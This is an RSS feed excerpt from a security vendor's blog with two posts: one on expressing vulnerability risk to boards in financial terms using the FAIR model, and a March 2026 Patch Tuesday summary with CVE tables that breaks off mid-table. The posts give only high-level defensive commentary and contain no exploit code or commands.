<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Vulnerability Management - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Mon, 06 Apr 2026 01:18:09 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/vulnerability-management/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[Negotiating with the Board: Translating Active Risk into Financial Exposure]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Security leaders rarely struggle to produce data. The challenge is turning that data into something the board can use to make decisions.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Walk into a board meeting with a slide showing 1,200 critical vulnerabilities and 44 internet-facing assets, and you will likely see polite acknowledgment rather than meaningful discussion. The question that follows tends to cut through quickly: what does this mean for the business?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Boards allocate capital based on financial exposure, not vulnerability counts. A list of findings describes workload, but directors are responsible for revenue protection, liability, and risk to the balance sheet. When security reporting remains technical, it sits outside the way investment decisions are made elsewhere in the organization. The issue is less about communication and more about framing the problem in terms the business already understands.</span></p><h2 style="direction: ltr;">From severity to risk</h2><p style="direction: ltr;"><span style='font-size: undefined;'>CVSS measures theoretical severity, but it does not measure business risk. A high score indicates that a flaw could be dangerous, yet it does not tell you whether the vulnerability is reachable in your environment, whether exploit code exists, or whether it is likely to affect revenue in the near term. It answers a useful engineering question, but it does not answer the question the board is asking.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That question is about likelihood and impact. Most enterprise risk frameworks define risk in those terms, and that is how financial decisions are made. The gap becomes clear when two vulnerabilities appear similar on a dashboard but carry very different consequences. A high-CVSS issue on a segmented lab system may present little business risk, while a moderately severe vulnerability on an internet-facing production system with active exploit activity can expose regulated data and revenue streams.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What is often missing in that comparison is threat context. Understanding how attackers behave, which vulnerabilities they are exploiting, and where access paths actually exist changes how risk is interpreted. Active Risk in InsightVM brings those elements together by combining exploit telemetry, attacker behavior, and asset context to estimate the likelihood that a vulnerability will be used. When that likelihood is paired with business impact, the conversation shifts toward exposure rather than severity.</span></p><h2 style="direction: ltr;">From CVSS scores to financial exposure</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Prioritization alone does not translate into board-level decisions. Knowing what is most likely to be exploited is necessary, but it is not sufficient when the goal is to justify investment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>FAIR provides a way to bridge that gap. The model defines risk as a combination of how often a loss event is likely to occur and how much that event would cost. In practical terms:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Annualized Loss Exposure (ALE) = Loss Event Frequency × Probable Loss Magnitude</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Active Risk informs the likelihood side of that equation by grounding it in observed attacker behavior and exploit activity. FAIR converts that likelihood into financial terms, allowing security teams to describe exposure in a way that aligns with how capital is allocated.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Instead of reporting that a set of vulnerabilities is “high risk,” the discussion becomes more concrete. A team might say that a group of issues represents several million dollars in annualized exposure across systems tied to revenue. That is a number that can be evaluated alongside other business risks, rather than interpreted as a technical signal.</span></p><h2 style="direction: ltr;">A practical example</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Consider two vulnerabilities identified during a scan. The first is a CVSS 9.8 issue on a segmented guest Wi-Fi router. It is severe from a technical standpoint, but it has no access to sensitive data, no path into production systems, and no evidence of active exploitation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The second is a vulnerability with a moderate CVSS score on an internet-facing customer database. Public exploit code exists, and the system stores regulated data tied directly to revenue and compliance obligations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On a scanner dashboard, the first may appear more urgent. When viewed through a financial lens, the second carries greater risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Assume an annual probability of exploitation of 20 percent for the database scenario. If the potential impact includes $750,000 in incident response, $1.2 million from several days of business interruption, $600,000 in legal and regulatory costs, and $1 million in customer churn and reputational damage, the total loss for a single event is $3.55 million.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Applying the FAIR model results in approximately $710,000 in annualized exposure. That figure reflects the risk carried by that single vulnerability on a production system.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By contrast, even if the Wi-Fi router vulnerability had a 5 percent probability of exploitation and a $50,000 impact, the resulting exposure would be around $2,500. Both findings may appear critical in a technical report, but only one represents a material financial concern.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is where Active Risk and FAIR work together. One identifies where attackers are likely to act, and the other expresses the consequence in financial terms. The combination changes how vulnerabilities are evaluated and how priorities are set.</span></p><h2 style="direction: ltr;">Visualizing exposure across your environment</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Once risk is expressed in financial terms, the next step is to understand how that exposure is distributed. Boards tend to think in terms of portfolios rather than individual issues, and the same principle applies to cybersecurity.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In most environments, exposure is not evenly spread. A relatively small number of systems and vulnerabilities account for a large portion of potential loss. Internet-facing services, systems tied to revenue, and assets with known exploit activity often sit at the higher end of that distribution.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This creates a practical way to focus effort. Rather than attempting to address every vulnerability equally, teams can identify where exposure is concentrated and reduce risk in those areas first. In many cases, addressing a small number of issues can significantly reduce overall exposure, particularly when those issues sit on systems that are both reachable and business-critical.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A before-and-after view helps make this visible. If an organization reduces modeled exposure from several million dollars to a substantially lower figure through targeted remediation, the result can be explained in terms of reduced downside risk rather than increased patching activity. Over time, tracking that change shows whether investments are producing measurable outcomes.</span></p><h2 style="direction: ltr;">Making risk actionable</h2><p style="direction: ltr;"><span style='font-size: undefined;'>By the time exposure is expressed in financial terms, the discussion in the boardroom has already shifted. The focus moves away from counts and severity toward risk, trade-offs, and acceptable levels of exposure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>One of the first issues that arises in that context is the assumption that risk should be driven to zero. In practice, eliminating all exposure is neither achievable nor economically sensible. Reducing risk always involves trade-offs, and those trade-offs become clearer when expressed in financial terms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If an organization has already reduced exposure significantly, but further reduction requires a disproportionate increase in cost, the decision becomes one of balance. The question is no longer why risk still exists, but whether the remaining exposure aligns with the organization’s tolerance.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The same logic applies when discussing budget. Requests framed in operational terms, such as additional headcount or tooling, are difficult to evaluate in isolation. When those requests are tied to measurable reductions in exposure, the relationship between cost and benefit becomes clearer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For example, if additional resources reduce several million dollars of modeled exposure at a fraction of that cost, the investment can be assessed alongside other initiatives using the same financial lens. At that point, the discussion is no longer about capacity. It is about risk reduction.</span></p><h2 style="direction: ltr;">Putting security in business terms</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Reducing exposure also affects how the organization is perceived externally. Cyber insurance underwriting, for example, increasingly considers factors such as attack surface, exploit availability, and remediation speed. Demonstrating that exposure is measured and reduced over time can influence how risk is priced.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The same applies during customer due diligence. Being able to explain where risk exists, how it is prioritized, and how it has been reduced provides evidence of maturity. It shows that security is being managed deliberately rather than reactively.</span></p><h2 style="direction: ltr;">Aligning to risk tolerance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Productive board discussions tend to end with agreement on acceptable levels of exposure. Without a financial view, every issue can appear urgent. With it, prioritization becomes more grounded.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Leadership can evaluate whether the level of risk being carried is consistent with business objectives, and whether further investment is warranted. That shifts vulnerability management from a process focused on volume to one focused on where exposure is concentrated and how it can be reduced most effectively.</span></p><h2 style="direction: ltr;">Clear exposure, clearer decisions</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Vulnerability management has often been treated as an operational activity centered on patching and scanning. When combined with threat context and financial modeling, it becomes part of enterprise risk management.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Instead of reporting how many vulnerabilities exist, security leaders can describe how much exposure the organization carries. Instead of focusing on activity, they can show how targeted actions reduce risk over time. That framing aligns cybersecurity with the same decision-making process used across the rest of the business.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When exposure is clear, decisions become clearer. Leadership can determine where to accept risk, where to transfer it, and where to invest in reduction. The conversation with the board moves away from technical detail and toward measurable impact, which is where security becomes part of strategy rather than an isolated function.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-translating-active-into-risk-financial-exposure-board-negotiating-vm</link>
      <guid isPermaLink="false">bltd666bc56e792643d</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Trevor Christiansen]]></dc:creator>
      <pubDate>Fri, 20 Mar 2026 15:18:20 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt09a532eac4a02570/6852c5968e72c44b89691ca4/PSN-gov-showcase-hero-image-2.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - March 2026]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 77 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Mar"><span style='font-size: undefined;'>March 2026 Patch Tuesday</span></a><span style='font-size: undefined;'>. Microsoft is aware of public disclosure of two of today’s vulnerabilities, but without evidence of exploitation in the wild for any (yet), so there are no Microsoft additions to CISA KEV today. Earlier in the month, Microsoft provided patches to address nine browser vulnerabilities, which are not included in the Patch Tuesday count above.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>SQL Server: zero-day remote EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>SQL Server often goes several months in a row without any mention on Patch Tuesday. Today, however, all versions from the latest and greatest SQL Server 2025 back as far as SQL Server 2016 SP3 receive patches for </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-21262"><span style='font-size: undefined;'>CVE-2026-21262</span></a><span style='font-size: undefined;'>, a SQL Server elevation of privilege vulnerability. This isn’t just any elevation of privilege vulnerability, either; the advisory notes that an authorized attacker can elevate privileges to sysadmin over a network. The CVSS v3 base score of 8.8 is just below the threshold for critical severity, since low-level privileges are required.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is aware of public disclosure, so while they assess the likelihood of exploitation as less likely, it would be a courageous defender who shrugged and deferred the patches for this one. Most SQL Server admins and security teams concluded many years ago that exposing SQL Server directly to the internet was not a good idea. Then again, popular search engines for internet-connected devices describe tens of thousands of SQL Server instances, and they can’t all be </span><a href="https://www.rapid7.com/fundamentals/honeypots/"><span style='font-size: undefined;'>honeypots</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What could an attacker do as SQL Server sysadmin? Beyond exfiltrating or interfering with the database itself, the obvious target is </span><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver17"><span style='font-size: undefined;'>xp_cmdshell,</span></a><span style='font-size: undefined;'> which allows direct callouts to the underlying OS. The good news is that xp_cmdshell is disabled by default as far back as SQL Server 2005; the bad news is that anyone acting as SQL Server sysadmin can enable it in seconds. At that point, the attacker is acting with the full privileges of the security context under which SQL Server runs, which is ideally a purpose-built account designed with least privilege in mind. If you want to hear some hair-raising stories, you have only to ask any incident response veteran if they’ve ever seen it set up differently.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Anyone paying for Extended Security Updates (ESU) for </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/sql-server-2014"><span style='font-size: undefined;'>SQL Server 2014</span></a><span style='font-size: undefined;'> or </span><a href="https://www.microsoft.com/en-ca/windows-server/extended-security-updates"><span style='font-size: undefined;'>SQL Server 2012</span></a><span style='font-size: undefined;'> may be forgiven for wondering why there’s no security update for those venerable versions of the world’s most widely deployed closed-source database product. We can hope that the vulnerability described by </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-21262"><span style='font-size: undefined;'>CVE-2026-21262</span></a><span style='font-size: undefined;'> was introduced in newer codebases only.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>.NET: zero-day DoS</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Attackers fond of low-effort denial of service attacks against .NET applications will be checking out </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-26127"><span style='font-size: undefined;'>CVE-2026-26127</span></a><span style='font-size: undefined;'> today. Microsoft is aware of public disclosure. While the immediate impact of exploitation is likely contained to denial of service by triggering a crash, opportunities for other types of attacks might emerge during a service reboot. Alternatively, if a log forwarder or security agent is impacted, even for a brief period of time, an attacker might carry out an attack in that moment hoping to evade detection under cover of this artificial darkness. Even if a low-skilled attacker simply causes downtime, in some contexts that could be enough to cause an SLA breach or loss of revenue, or at the very least cause a bleary-eyed defender to get paged in the middle of the night.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Authenticator: QR code impersonation</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Authenticator mobile app users on both iOS and Android should update to the latest version to prevent exploitation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-26123"><span style='font-size: undefined;'>CVE-2026-26123</span></a><span style='font-size: undefined;'>, which involves a malicious app disguising itself as Microsoft Authenticator. Exploitation succeeds when the malicious app receives enough information to impersonate the user.</span></p><p><span style='font-size: undefined;'>Authenticator-type apps are often installed on a personal device, but it's not unusual for them to provide multi-factor authentication (MFA) codes for production services in a bring-your-own-device context. This is as good a time as any for defenders to consider how well their mobile device management policy covers app choice enforcement and patching for MFA apps.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The CVSS v3 base score of 5.5 might appear unremarkable, and exploitation requires user interaction, since the user must install the malicious app in the first place. However, exploitation could begin via an attacker-controlled link, or even a malicious QR code that drives users to the malicious app, and a motivated attacker with a physical presence near the user base might well consider this option.</span></p><p>According to Khaled Mohamed, the researcher who discovered this vulnerability, the legitimate Microsoft Authenticator app did not previously register itself as the handler for deep links into its own custom URL scheme. A malicious app could exploit this gap by simply registering itself as the default handler. He further notes that in this scenario, a user of a mobile device with a malicious app installed only needs to click a generic “Open link” dialog, rather than expressly selecting the malicious app each time. This means that the Microsoft advisory is perhaps too optimistic about how much user interaction is required to trigger exploitation.</p><p><span style='font-size: undefined;'>Microsoft ranks this vulnerability as important on their proprietary severity scale. The advisory also provides a brief peek behind the curtain, since the executive summary notes that “Cwe is not in rca”. The weakness listed on the advisory is </span><a href="https://cwe.mitre.org/data/definitions/939.html"><span style='font-size: undefined;'>CWE-939: Improper Authorization in Handler for Custom URL Scheme</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant Microsoft product lifecycle changes this month, unless you are responsible for a Microsoft SQL Server 2012 Parallel Data Warehouse instance, which moves beyond extended support as of March 31st. It would be wise not to count on a last-minute extension, since Microsoft has already </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/microsoft-sql-server-2012-parallel-data-warehouse-analytics-platform-system?branch=live"><span style='font-size: undefined;'>granted a six month reprieve</span></a><span style='font-size: undefined;'>.</span></p><h2>Summary charts</h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1eb03d9aaae4789e/69b080d13839da0008909eed/2026-03-vuln_count_component.png" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Mar" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Mar" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1eb03d9aaae4789e/69b080d13839da0008909eed/2026-03-vuln_count_component.png" data-sys-asset-uid="blt1eb03d9aaae4789e" data-sys-asset-filename="2026-03-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Mar" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt46184b3e75232820/69b080d100b88e0008c9611c/2026-03-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Feb" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Feb" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt46184b3e75232820/69b080d100b88e0008c9611c/2026-03-vuln_count_impact.png" data-sys-asset-uid="blt46184b3e75232820" data-sys-asset-filename="2026-03-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Feb" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt29de0336d7d8cf8b/69b080d1030f160008148553/2026-03-vuln_count_impact-component-heatmap.png" alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Mar" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Mar" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt29de0336d7d8cf8b/69b080d1030f160008148553/2026-03-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt29de0336d7d8cf8b" data-sys-asset-filename="2026-03-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Mar" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><p></p><p></p><p></p><p></p><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26123">CVE-2026-26123</a></td><td><p>Microsoft Authenticator Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26117">CVE-2026-26117</a></td><td><p>Arc Enabled Servers - Azure Connected Machine Agent Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23664">CVE-2026-23664</a></td><td><p>Azure IoT Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23661">CVE-2026-23661</a></td><td><p>Azure IoT Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23662">CVE-2026-23662</a></td><td><p>Azure IoT Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26121">CVE-2026-26121</a></td><td><p>Azure IOT Explorer Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26118">CVE-2026-26118</a></td><td><p>Azure MCP Server Tools Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26141">CVE-2026-26141</a></td><td><p>Hybrid Worker Extension (Arc‑enabled Windows VMs) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23665">CVE-2026-23665</a></td><td><p>Linux Azure Diagnostic extension (LAD) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26148">CVE-2026-26148</a></td><td><p>Microsoft Azure AD SSH Login extension for Linux Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23660">CVE-2026-23660</a></td><td><p>Windows Admin Center in Azure Portal Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26127">CVE-2026-26127</a></td><td><p>.NET Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>Yes</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26131">CVE-2026-26131</a></td><td><p>.NET Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26130">CVE-2026-26130</a></td><td><p>ASP.NET Core Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3>ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25177">CVE-2026-25177</a></td><td><p>Active Directory Domain Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23667">CVE-2026-23667</a></td><td><p>Broadcast DVR Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25190">CVE-2026-25190</a></td><td><p>GDI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25181">CVE-2026-25181</a></td><td><p>GDI+ Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23674">CVE-2026-23674</a></td><td><p>MapUrlToZone Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25165">CVE-2026-25165</a></td><td><p>Performance Counters for Windows Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24282">CVE-2026-24282</a></td><td><p>Push message Routing Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24285">CVE-2026-24285</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24291">CVE-2026-24291</a></td><td><p>Windows Accessibility Infrastructure (ATBroker.exe) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25186">CVE-2026-25186</a></td><td><p>Windows Accessibility Infrastructure (ATBroker.exe) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24293">CVE-2026-24293</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25176">CVE-2026-25176</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25178">CVE-2026-25178</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25179">CVE-2026-25179</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25171">CVE-2026-25171</a></td><td><p>Windows Authentication Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23671">CVE-2026-23671</a></td><td><p>Windows Bluetooth RFCOM Protocol Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24292">CVE-2026-24292</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24295">CVE-2026-24295</a></td><td><p>Windows Device Association Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24296">CVE-2026-24296</a></td><td><p>Windows Device Association Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25189">CVE-2026-25189</a></td><td><p>Windows DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25174">CVE-2026-25174</a></td><td><p>Windows Extensible File Allocation Table Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25168">CVE-2026-25168</a></td><td><p>Windows Graphics Component Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25169">CVE-2026-25169</a></td><td><p>Windows Graphics Component Denial of Service 